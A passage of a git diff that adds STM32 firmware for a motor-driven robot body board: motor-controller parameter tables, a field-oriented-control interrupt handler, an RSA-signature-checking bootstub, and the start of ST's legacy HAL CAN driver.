0, 1, 4, 3, 5, 0 } +}; + +P rtP_Left = { + /* Variable: dV_openRate + * Referenced by: '/dV_openRate' + */ + 12288, + + /* Variable: dz_cntTrnsDetHi + * Referenced by: '/dz_cntTrnsDet' + */ + 40, + + /* Variable: dz_cntTrnsDetLo + * Referenced by: '/dz_cntTrnsDet' + */ + 20, + + /* Variable: n_cruiseMotTgt + * Referenced by: '/n_cruiseMotTgt' + */ + 0, + + /* Variable: z_maxCntRst + * Referenced by: + * '/Counter' + * '/z_maxCntRst' + * '/z_maxCntRst2' + * '/UnitDelay3' + * '/z_counter' + */ + 2000, + + /* Variable: cf_speedCoef + * Referenced by: '/cf_speedCoef' + */ + 10667U, + + /* Variable: t_errDequal + * Referenced by: '/t_errDequal' + */ + 9600U, + + /* Variable: t_errQual + * Referenced by: '/t_errQual' + */ + 1280U, + + /* Variable: Vd_max + * Referenced by: + * '/Vd_max' + * '/Vd_max1' + */ + 14400, + + /* Variable: Vq_max_M1 + * Referenced by: '/Vq_max_M1' + */ + { 14400, 14396, 14386, 14368, 14343, 14311, 14271, 14225, 14171, 14109, 14040, + 13963, 13879, 13786, 13685, 13576, 13459, 13333, 13198, 13053, 12900, 12736, + 12562, 12377, 12181, 11973, 11753, 11520, 11273, 11011, 10733, 10438, 10124, + 9790, 9433, 9051, 8640, 8196, 7713, 7184, 6597, 5935, 5170, 4245, 3019, 0 }, + + /* Variable: Vq_max_XA + * Referenced by: '/Vq_max_XA' + */ + { 0, 320, 640, 960, 1280, 1600, 1920, 2240, 2560, 2880, 3200, 3520, 3840, 4160, + 4480, 4800, 5120, 5440, 5760, 6080, 6400, 6720, 7040, 7360, 7680, 8000, 8320, + 8640, 8960, 9280, 9600, 9920, 10240, 10560, 10880, 11200, 11520, 11840, + 12160, 12480, 12800, 13120, 13440, 13760, 14080, 14400 }, + + /* Variable: a_phaAdvMax + * Referenced by: '/a_phaAdvMax' + */ + 400, + + /* Variable: i_max + * Referenced by: + * '/i_max' + * '/i_max' + */ + 12000, + + /* Variable: id_fieldWeakMax + * Referenced by: '/id_fieldWeakMax' + */ + 4000, + + /* Variable: n_commAcvLo + * Referenced by: '/n_commDeacv' + */ + 240, + + /* Variable: n_commDeacvHi + * Referenced by: '/n_commDeacv' + */ + 480, + + /* Variable: n_fieldWeakAuthHi + * Referenced by: '/n_fieldWeakAuthHi' + */ + 6400, + + /* Variable: n_fieldWeakAuthLo + * Referenced by: '/n_fieldWeakAuthLo' + */ + 4800, + + /* Variable: n_max + * Referenced by: + * '/n_max' + * '/n_max1' + */ + 16000, + + /* Variable: n_stdStillDet + * Referenced by: '/n_stdStillDet' + */ + 48, + + /* Variable: r_errInpTgtThres + * Referenced by: '/r_errInpTgtThres' + */ + 9600, + + /* Variable: r_fieldWeakHi + * Referenced by: '/r_fieldWeakHi' + */ + 16000, + + /* Variable: r_fieldWeakLo + * Referenced by: '/r_fieldWeakLo' + */ + 12000, + + /* Variable: cf_KbLimProt + * Referenced by: + * '/cf_KbLimProt' + * '/cf_KbLimProt' + */ + 768U, + + /* Variable: cf_idKp + * Referenced by: '/cf_idKp1' + */ + 819U, + + /* Variable: cf_iqKp + * Referenced by: '/cf_iqKp' + */ + 1229U, + + /* Variable: cf_nKp + * Referenced by: '/cf_nKp' + */ + 4833U, + + /* Variable: cf_currFilt + * Referenced by: '/cf_currFilt' + */ + 7864U, + + /* Variable: cf_idKi + * Referenced by: '/cf_idKi1' + */ + 737U, + + /* Variable: cf_iqKi + * Referenced by: '/cf_iqKi' + */ + 1229U, + + /* Variable: cf_iqKiLimProt + * Referenced by: + * '/cf_iqKiLimProt' + * '/cf_iqKiLimProt' + */ + 737U, + + /* Variable: cf_nKi + * Referenced by: '/cf_nKi' + */ + 251U, + + /* Variable: cf_nKiLimProt + * Referenced by: + * '/cf_nKiLimProt' + * '/cf_nKiLimProt' + */ + 246U, + + /* Variable: n_polePairs + * Referenced by: '/n_polePairs' + */ + 15U, + + /* Variable: z_ctrlTypSel + * Referenced by: '/z_ctrlTypSel' + */ + 2U, + + /* Variable: z_selPhaCurMeasABC + * Referenced by: '/z_selPhaCurMeasABC' + */ + 0U, + + /* Variable: b_angleMeasEna + * Referenced by: + * '/b_angleMeasEna' + * '/b_angleMeasEna' + */ + 0, + + /* Variable: b_cruiseCtrlEna + * Referenced by: '/b_cruiseCtrlEna' + */ + 0, + + /* Variable: b_diagEna + * Referenced by: '/b_diagEna' + */ + 1, + + /* Variable: b_fieldWeakEna + * Referenced by: + * '/b_fieldWeakEna' + * '/b_fieldWeakEna' + */ + 0 +}; /* Modifiable parameters */ + +/* + * File trailer for generated code. + * + * [EOF] + */ diff --git a/body/board/bldc/bldc.c b/body/board/bldc/bldc.c new file mode 100644 index 000000000..1c5ea11f5 --- /dev/null +++ b/body/board/bldc/bldc.c @@ -0,0 +1,270 @@ +/* +* This file implements FOC motor control. +* This control method offers superior performanace +* compared to previous cummutation method. The new method features: +* ► reduced noise and vibrations +* ► smooth torque output +* ► improved motor efficiency -> lower energy consumption +* +* Copyright (C) 2019-2020 Emanuel FERU +* +* This program is free software: you can redistribute it and/or modify +* it under the terms of the GNU General Public License as published by +* the Free Software Foundation, either version 3 of the License, or +* (at your option) any later version. +* +* This program is distributed in the hope that it will be useful, +* but WITHOUT ANY WARRANTY; without even the implied warranty of +* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +* GNU General Public License for more details. +* +* You should have received a copy of the GNU General Public License +* along with this program. If not, see . +*/ + +#include "stm32f4xx_hal.h" +#include "defines.h" +#include "config.h" +#include "util.h" + +// Matlab includes and defines - from auto-code generation +// ############################################################################### +#include "BLDC_controller.h" /* Model's header file */ +#include "rtwtypes.h" + +extern board_t board; + +extern RT_MODEL *const rtM_Left; +extern RT_MODEL *const rtM_Right; + +extern DW rtDW_Left; /* Observable states */ +extern ExtU rtU_Left; /* External inputs */ +extern ExtY rtY_Left; /* External outputs */ +extern P rtP_Left; + +extern DW rtDW_Right; /* Observable states */ +extern ExtU rtU_Right; /* External inputs */ +extern ExtY rtY_Right; /* External outputs */ +// ############################################################################### + +static int16_t pwm_margin; /* This margin allows to have a window in the PWM signal for proper FOC Phase currents measurement */ + +extern uint8_t ctrlModReq; +static int16_t curDC_max = (I_DC_MAX * A2BIT_CONV); +int16_t curL_phaA = 0, curL_phaB = 0, curL_DC = 0; +int16_t curR_phaB = 0, curR_phaC = 0, curR_DC = 0; + +volatile int pwml = 0; +volatile int pwmr = 0; + +extern volatile adc_buf_t adc_buffer; + +uint8_t buzzerFreq = 0; +uint8_t buzzerPattern = 0; +uint8_t buzzerCount = 0; +volatile uint32_t buzzerTimer = 0; +static uint8_t buzzerPrev = 0; +static uint8_t buzzerIdx = 0; + +uint8_t enable_motors = 0; // initially motors are disabled for SAFETY +static uint8_t enableFin = 0; + +static const uint16_t pwm_res = CORE_FREQ / 2 / PWM_FREQ; + +static uint16_t offsetcount = 0; +static int16_t offsetrlA = 2000; +static int16_t offsetrlB = 2000; +static int16_t offsetrrB = 2000; +static int16_t offsetrrC = 2000; +static int16_t offsetdcl = 2000; +static int16_t offsetdcr = 2000; + +int16_t batVoltage = (400 * BAT_CELLS * BAT_CALIB_ADC) / BAT_CALIB_REAL_VOLTAGE; +static int32_t batVoltageFixdt = (400 * BAT_CELLS * BAT_CALIB_ADC) / BAT_CALIB_REAL_VOLTAGE << 16; // Fixed-point filter output initialized at 400 V*100/cell = 4 V/cell converted to fixed-point + +int32_t motPosL = 0; +int32_t motPosR = 0; + +// DMA interrupt frequency =~ 16 kHz +void DMA2_Stream0_IRQHandler(void) { + DMA2->LIFCR = DMA_LIFCR_CTCIF0; + + if(offsetcount < 2000) { // calibrate ADC offsets + offsetcount++; + offsetrlA = (adc_buffer.rlA + offsetrlA) / 2; + offsetrlB = (adc_buffer.rlB + offsetrlB) / 2; + offsetrrB = (adc_buffer.rrB + offsetrrB) / 2; + offsetrrC = (adc_buffer.rrC + offsetrrC) / 2; + offsetdcl = (adc_buffer.dcl + offsetdcl) / 2; + offsetdcr = (adc_buffer.dcr + offsetdcr) / 2; + return; + } + + if (buzzerTimer % 1000 == 0) { // Filter battery voltage at a slower sampling rate + filtLowPass32(adc_buffer.batt1, BAT_FILT_COEF, &batVoltageFixdt); + batVoltage = (int16_t)(batVoltageFixdt >> 16); // convert fixed-point to integer + } + + // Get Left motor currents + curL_phaA = (int16_t)(offsetrlA - adc_buffer.rlA); + curL_phaB = (int16_t)(offsetrlB - adc_buffer.rlB); + curL_DC = (int16_t)(offsetdcl - adc_buffer.dcl); + + // Get Right motor currents + curR_phaB = (int16_t)(offsetrrB - adc_buffer.rrB); + curR_phaC = (int16_t)(offsetrrC - adc_buffer.rrC); + curR_DC = (int16_t)(offsetdcr - adc_buffer.dcr); + + // Disable PWM when current limit is reached (current chopping) + // This is the Level 2 of current protection. The Level 1 should kick in first given by I_MOT_MAX + if(ABS(curL_DC) > curDC_max || enable_motors == 0) { + LEFT_TIM->BDTR &= ~TIM_BDTR_MOE; + } else { + LEFT_TIM->BDTR |= TIM_BDTR_MOE; + } + + if(ABS(curR_DC) > curDC_max || enable_motors == 0) { + RIGHT_TIM->BDTR &= ~TIM_BDTR_MOE; + } else { + RIGHT_TIM->BDTR |= TIM_BDTR_MOE; + } + + // Create square wave for buzzer + buzzerTimer++; + if (buzzerFreq != 0 && (buzzerTimer / 5000) % (buzzerPattern + 1) == 0) { + if (buzzerPrev == 0) { + buzzerPrev = 1; + if (++buzzerIdx > (buzzerCount + 2)) { // pause 2 periods + buzzerIdx = 1; + } + } + if (buzzerTimer % buzzerFreq == 0 && (buzzerIdx <= buzzerCount || buzzerCount == 0)) { + HAL_GPIO_TogglePin(BUZZER_PORT, BUZZER_PIN); + } + } else if (buzzerPrev) { + HAL_GPIO_WritePin(BUZZER_PORT, BUZZER_PIN, GPIO_PIN_RESET); + buzzerPrev = 0; + } + + // Adjust pwm_margin depending on the selected Control Type + if (rtP_Left.z_ctrlTypSel == FOC_CTRL) { + pwm_margin = 110; + } else { + pwm_margin = 0; + } + + // ############################### MOTOR CONTROL ############################### + + int ul, vl, wl; + int ur, vr, wr; + static boolean_T OverrunFlag = false; + + if (OverrunFlag) { + return; + } + OverrunFlag = true; + + /* Make sure to stop BOTH motors in case of an error */ + enableFin = enable_motors && !rtY_Left.z_errCode && !rtY_Right.z_errCode; + + // ========================= LEFT MOTOR ============================ + uint8_t hall_ul = !(board.hall_left.hall_portA->IDR & board.hall_left.hall_pinA); + uint8_t hall_vl = !(board.hall_left.hall_portB->IDR & board.hall_left.hall_pinB); + uint8_t hall_wl = !(board.hall_left.hall_portC->IDR & board.hall_left.hall_pinC); + + rtU_Left.b_motEna = enableFin; + rtU_Left.z_ctrlModReq = ctrlModReq; + rtU_Left.r_inpTgt = pwml; + rtU_Left.b_hallA = hall_wl; + rtU_Left.b_hallB = hall_vl; + rtU_Left.b_hallC = hall_ul; + rtU_Left.i_phaAB = curL_phaA; + rtU_Left.i_phaBC = curL_phaB; + rtU_Left.i_DCLink = curL_DC; + + #ifdef MOTOR_LEFT_ENA + BLDC_controller_step(rtM_Left); + #endif + + ul = rtY_Left.DC_phaA; + vl = rtY_Left.DC_phaB; + wl = rtY_Left.DC_phaC; + + /* Apply commands */ + LEFT_TIM->LEFT_TIM_U = (uint16_t)CLAMP(ul + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + LEFT_TIM->LEFT_TIM_V = (uint16_t)CLAMP(vl + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + LEFT_TIM->LEFT_TIM_W = (uint16_t)CLAMP(wl + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + // ================================================================= + + + // ========================= RIGHT MOTOR =========================== + uint8_t hall_ur = !(board.hall_right.hall_portA->IDR & board.hall_right.hall_pinA); + uint8_t hall_vr = !(board.hall_right.hall_portB->IDR & board.hall_right.hall_pinB); + uint8_t hall_wr = !(board.hall_right.hall_portC->IDR & board.hall_right.hall_pinC); + + rtU_Right.b_motEna = enableFin; + rtU_Right.z_ctrlModReq = ctrlModReq; + rtU_Right.r_inpTgt = pwmr; + rtU_Right.b_hallA = hall_ur; + rtU_Right.b_hallB = hall_vr; + rtU_Right.b_hallC = hall_wr; + rtU_Right.i_phaAB = curR_phaB; + rtU_Right.i_phaBC = curR_phaC; + rtU_Right.i_DCLink = curR_DC; + + #ifdef MOTOR_RIGHT_ENA + BLDC_controller_step(rtM_Right); + #endif + + ur = rtY_Right.DC_phaA; + vr = rtY_Right.DC_phaB; + wr = rtY_Right.DC_phaC; + + /* Apply commands */ + RIGHT_TIM->RIGHT_TIM_U = (uint16_t)CLAMP(ur + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + RIGHT_TIM->RIGHT_TIM_V = (uint16_t)CLAMP(vr + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + RIGHT_TIM->RIGHT_TIM_W = (uint16_t)CLAMP(wr + pwm_res / 2, pwm_margin, pwm_res-pwm_margin); + // ================================================================= + + OverrunFlag = false; + + static int16_t motAngleLeftLast = 0; + static int16_t motAngleRightLast = 0; + static int32_t cycleDegsL = 0; // wheel encoder roll over count in deg + static int32_t cycleDegsR = 0; // wheel encoder roll over count in deg + int16_t diffL = 0; + int16_t diffR = 0; + static int16_t cnt = 0; + + if (enable_motors == 0) { // Reset everything if motors are disabled + cycleDegsL = 0; + cycleDegsR = 0; + diffL = 0; + diffR = 0; + cnt = 0; + } + if (cnt == 0) { + motAngleLeftLast = rtY_Left.a_elecAngle; + motAngleRightLast = rtY_Right.a_elecAngle; + } + + diffL = rtY_Left.a_elecAngle - motAngleLeftLast; + if (diffL < -180) { + cycleDegsL = cycleDegsL - 360; + } else if (diffL > 180) { + cycleDegsL = cycleDegsL + 360; + } + motPosL = cycleDegsL + (360 - rtY_Left.a_elecAngle); + + diffR = rtY_Right.a_elecAngle - motAngleRightLast; + if (diffR < -180) { + cycleDegsR = cycleDegsR - 360; + } else if (diffR > 180) { + cycleDegsR = cycleDegsR + 360; + } + motPosR = cycleDegsR + (360 - rtY_Right.a_elecAngle); + + motAngleLeftLast = rtY_Left.a_elecAngle; + motAngleRightLast = rtY_Right.a_elecAngle; + cnt++; +} diff --git a/body/board/bootstub.c b/body/board/bootstub.c new file mode 100644 index 000000000..f75a93924 --- /dev/null +++ b/body/board/bootstub.c @@ -0,0 +1,119 @@ +#define BOOTSTUB + +#define VERS_TAG 0x53524556 +#define MIN_VERSION 2 + +#define RECOVERY_MODE_DELAY 5 + +// ********************* Includes ********************* +#include +#include +#include "libc.h" +#include "stm32f4xx_hal.h" +#include "defines.h" +#include "setup.h" +#include "drivers/clock.h" +#include "early_init.h" + +#include "crypto/rsa.h" +#include "crypto/sha.h" + +#include "obj/cert.h" +#include "obj/gitversion.h" + +#include "drivers/llbxcan.h" +#include "drivers/llflash.h" +#include "provision.h" +#include "util.h" +#include "boards.h" + +#include "flasher.h" + +uint8_t hw_type; // type of the board detected(0 - base, 3 - knee) + +void __initialize_hardware_early(void) { + early_initialization(); +} + +void fail(void) { + soft_flasher_start(); +} + +// know where to sig check +extern void *_app_start[]; + +int main(void) { + HAL_Init(); + HAL_NVIC_SetPriorityGrouping(NVIC_PRIORITYGROUP_4); + HAL_NVIC_SetPriority(MemoryManagement_IRQn, 0, 0); + HAL_NVIC_SetPriority(BusFault_IRQn, 0, 0); + HAL_NVIC_SetPriority(UsageFault_IRQn, 0, 0); + HAL_NVIC_SetPriority(SVCall_IRQn, 0, 0); + HAL_NVIC_SetPriority(DebugMonitor_IRQn, 0, 0); + HAL_NVIC_SetPriority(PendSV_IRQn, 0, 0); + HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0); + + SystemClock_Config(); + MX_GPIO_Clocks_Init(); + + board_detect(); + MX_GPIO_Common_Init(); + + out_enable(POWERSWITCH, true); + out_enable(LED_RED, false); + out_enable(LED_GREEN, false); + out_enable(LED_BLUE, false); + + if(HAL_GPIO_ReadPin(BUTTON_PORT, BUTTON_PIN) && (hw_type == HW_TYPE_BASE)) { + uint16_t cnt_press = 0; + while(HAL_GPIO_ReadPin(BUTTON_PORT, BUTTON_PIN)) { + HAL_Delay(10); + cnt_press++; + if (cnt_press == (RECOVERY_MODE_DELAY * 100)) { + out_enable(LED_GREEN, true); + soft_flasher_start(); + } + } + } + + if (enter_bootloader_mode == ENTER_SOFTLOADER_MAGIC) { + enter_bootloader_mode = 0; + soft_flasher_start(); + } + + // validate length + int len = (int)_app_start[0]; + if ((len < 8) || (len > (0x1000000 - 0x4000 - 4 - RSANUMBYTES))) goto fail; + + // compute SHA hash + uint8_t digest[SHA_DIGEST_SIZE]; + SHA_hash(&_app_start[1], len-4, digest); + + // verify version, last bytes in the signed area + uint32_t vers[2] = {0}; + memcpy(&vers, ((void*)&_app_start[0]) + len - sizeof(vers), sizeof(vers)); + if (vers[0] != VERS_TAG || vers[1] < MIN_VERSION) { + goto fail; + } + + // verify RSA signature + if (RSA_verify(&release_rsa_key, ((void*)&_app_start[0]) + len, RSANUMBYTES, digest, SHA_DIGEST_SIZE)) { + goto good; + } + + // allow debug if built from source +#ifdef ALLOW_DEBUG + if (RSA_verify(&debug_rsa_key, ((void*)&_app_start[0]) + len, RSANUMBYTES, digest, SHA_DIGEST_SIZE)) { + goto good; + } +#endif + +// here is a failure +fail: + fail(); + return 0; +good: + // jump to flash + ((void(*)(void)) _app_start[1])(); + return 0; +} diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/Legacy/stm32f4xx_hal_can.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/Legacy/stm32f4xx_hal_can.c new file mode 100644 index 000000000..7a4cf5378 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/Legacy/stm32f4xx_hal_can.c @@ -0,0 +1,1697 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_can.c + * @author MCD Application Team + * @brief This file provides firmware functions to manage the following + * functionalities of the Controller Area Network (CAN) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Error functions + * + @verbatim + ============================================================================== + ##### User NOTE ##### + ============================================================================== + [..] + (#) This HAL CAN driver is deprecated, it contains some CAN Tx/Rx FIFO management limitations. + Another HAL CAN driver version has been designed with new API's, to fix these limitations. + + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Enable the CAN controller interface clock using + __HAL_RCC_CAN1_CLK_ENABLE() for CAN1, __HAL_RCC_CAN2_CLK_ENABLE() for CAN2 + and __HAL_RCC_CAN3_CLK_ENABLE() for CAN3 + -@- In case you are using CAN2 only, you have to enable the CAN1 clock. + + (#) CAN pins configuration + (++) Enable the clock for the CAN GPIOs using the following function: + __GPIOx_CLK_ENABLE() + (++) Connect and configure the involved CAN pins to AF9 using the + following function HAL_GPIO_Init() + + (#) Initialize and configure the CAN using CAN_Init() function. + + (#) Transmit the desired CAN frame using HAL_CAN_Transmit() function. + + (#) Or transmit the desired CAN frame using HAL_CAN_Transmit_IT() function. + + (#) Receive a CAN frame using HAL_CAN_Receive() function. + + (#) Or receive a CAN frame using HAL_CAN_Receive_IT() function. + + *** Polling mode IO operation *** + ================================= + [..] + (+) Start the CAN peripheral transmission and wait the end of this operation + using HAL_CAN_Transmit(), at this stage user can specify the value of timeout + according to his end application + (+) Start the CAN peripheral reception and wait the end of this operation + using HAL_CAN_Receive(), at this stage user can specify the value of timeout + according to his end application + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Start the CAN peripheral transmission using HAL_CAN_Transmit_IT() + (+) Start the CAN peripheral reception using HAL_CAN_Receive_IT() + (+) Use HAL_CAN_IRQHandler() called under the used CAN Interrupt subroutine + (+) At CAN end of transmission HAL_CAN_TxCpltCallback() function is executed and user can + add his own code by customization of function pointer HAL_CAN_TxCpltCallback + (+) In case of CAN Error, HAL_CAN_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_CAN_ErrorCallback + + *** CAN HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in CAN HAL driver. + + (+) __HAL_CAN_ENABLE_IT: Enable the specified CAN interrupts + (+) __HAL_CAN_DISABLE_IT: Disable the specified CAN interrupts + (+) __HAL_CAN_GET_IT_SOURCE: Check if the specified CAN interrupt source is enabled or disabled + (+) __HAL_CAN_CLEAR_FLAG: Clear the CAN's pending flags + (+) __HAL_CAN_GET_FLAG: Get the selected CAN's flag status + + [..] + (@) You can refer to the CAN Legacy HAL driver header file for more useful macros + + @endverbatim + + ****************************************************************************** + * @attention + * + *

© COPYRIGHT(c) 2017 STMicroelectronics

+ * + * Redistribution and use in source and binary forms, with or without modification, + * are permitted provided that the following conditions are met: + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * 3. Neither the name of STMicroelectronics nor the names of its contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup CAN CAN + * @brief CAN driver modules + * @{ + */ + +#ifdef HAL_CAN_LEGACY_MODULE_ENABLED + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) ||\ + defined(STM32F423xx) + +#ifdef HAL_CAN_MODULE_ENABLED +/* Select HAL CAN module in stm32f4xx_hal_conf.h file: + (#) HAL_CAN_MODULE_ENABLED for new HAL CAN driver fixing FIFO limitations + (#) HAL_CAN_LEGACY_MODULE_ENABLED for legacy HAL CAN driver */ +#error 'The HAL CAN driver cannot be used with its legacy, Please ensure to enable only one HAL CAN module at once in stm32f4xx_hal_conf.h file' +#endif /* HAL_CAN_MODULE_ENABLED */ + +#warning 'Legacy HAL CAN driver is enabled! It can be used with known limitations, refer to the release notes. However it is recommended to use rather the new HAL CAN driver' + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup CAN_Private_Constants + * @{ + */ +#define CAN_TIMEOUT_VALUE 10U +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup CAN_Private_Functions + * @{ + */ +static HAL_StatusTypeDef CAN_Receive_IT(CAN_HandleTypeDef* hcan, uint8_t FIFONumber); +static HAL_StatusTypeDef CAN_Transmit_IT(CAN_HandleTypeDef* hcan); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup CAN_Exported_Functions CAN Exported Functions + * @{ + */ + +/** @defgroup CAN_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the CAN. + (+) De-initialize the CAN. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the CAN peripheral according to the specified + * parameters in the CAN_InitStruct. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Init(CAN_HandleTypeDef* hcan) +{ + uint32_t InitStatus = CAN_INITSTATUS_FAILED; + uint32_t tickstart = 0U; + + /* Check CAN handle */ + if(hcan == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CAN_ALL_INSTANCE(hcan->Instance)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.TTCM)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.ABOM)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.AWUM)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.NART)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.RFLM)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.TXFP)); + assert_param(IS_CAN_MODE(hcan->Init.Mode)); + assert_param(IS_CAN_SJW(hcan->Init.SJW)); + assert_param(IS_CAN_BS1(hcan->Init.BS1)); + assert_param(IS_CAN_BS2(hcan->Init.BS2)); + assert_param(IS_CAN_PRESCALER(hcan->Init.Prescaler)); + + + if(hcan->State == HAL_CAN_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcan->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + HAL_CAN_MspInit(hcan); + } + + /* Initialize the CAN state*/ + hcan->State = HAL_CAN_STATE_BUSY; + + /* Exit from sleep mode */ + hcan->Instance->MCR &= (~(uint32_t)CAN_MCR_SLEEP); + + /* Request initialisation */ + hcan->Instance->MCR |= CAN_MCR_INRQ ; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the acknowledge */ + while((hcan->Instance->MSR & CAN_MSR_INAK) != CAN_MSR_INAK) + { + if((HAL_GetTick() - tickstart ) > CAN_TIMEOUT_VALUE) + { + hcan->State= HAL_CAN_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + + /* Check acknowledge */ + if ((hcan->Instance->MSR & CAN_MSR_INAK) == CAN_MSR_INAK) + { + /* Set the time triggered communication mode */ + if (hcan->Init.TTCM == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_TTCM; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_TTCM; + } + + /* Set the automatic bus-off management */ + if (hcan->Init.ABOM == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_ABOM; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_ABOM; + } + + /* Set the automatic wake-up mode */ + if (hcan->Init.AWUM == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_AWUM; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_AWUM; + } + + /* Set the no automatic retransmission */ + if (hcan->Init.NART == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_NART; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_NART; + } + + /* Set the receive FIFO locked mode */ + if (hcan->Init.RFLM == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_RFLM; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_RFLM; + } + + /* Set the transmit FIFO priority */ + if (hcan->Init.TXFP == ENABLE) + { + hcan->Instance->MCR |= CAN_MCR_TXFP; + } + else + { + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_TXFP; + } + + /* Set the bit timing register */ + hcan->Instance->BTR = (uint32_t)((uint32_t)hcan->Init.Mode) | \ + ((uint32_t)hcan->Init.SJW) | \ + ((uint32_t)hcan->Init.BS1) | \ + ((uint32_t)hcan->Init.BS2) | \ + ((uint32_t)hcan->Init.Prescaler - 1U); + + /* Request leave initialisation */ + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_INRQ; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the acknowledge */ + while((hcan->Instance->MSR & CAN_MSR_INAK) == CAN_MSR_INAK) + { + if((HAL_GetTick() - tickstart ) > CAN_TIMEOUT_VALUE) + { + hcan->State= HAL_CAN_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + + /* Check acknowledged */ + if ((hcan->Instance->MSR & CAN_MSR_INAK) != CAN_MSR_INAK) + { + InitStatus = CAN_INITSTATUS_SUCCESS; + } + } + + if(InitStatus == CAN_INITSTATUS_SUCCESS) + { + /* Set CAN error code to none */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Initialize the CAN state */ + hcan->State = HAL_CAN_STATE_READY; + + /* Return function status */ + return HAL_OK; + } + else + { + /* Initialize the CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + /* Return function status */ + return HAL_ERROR; + } +} + +/** + * @brief Configures the CAN reception filter according to the specified + * parameters in the CAN_FilterInitStruct. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param sFilterConfig pointer to a CAN_FilterConfTypeDef structure that + * contains the filter configuration information. + * @retval None + */ +HAL_StatusTypeDef HAL_CAN_ConfigFilter(CAN_HandleTypeDef* hcan, CAN_FilterConfTypeDef* 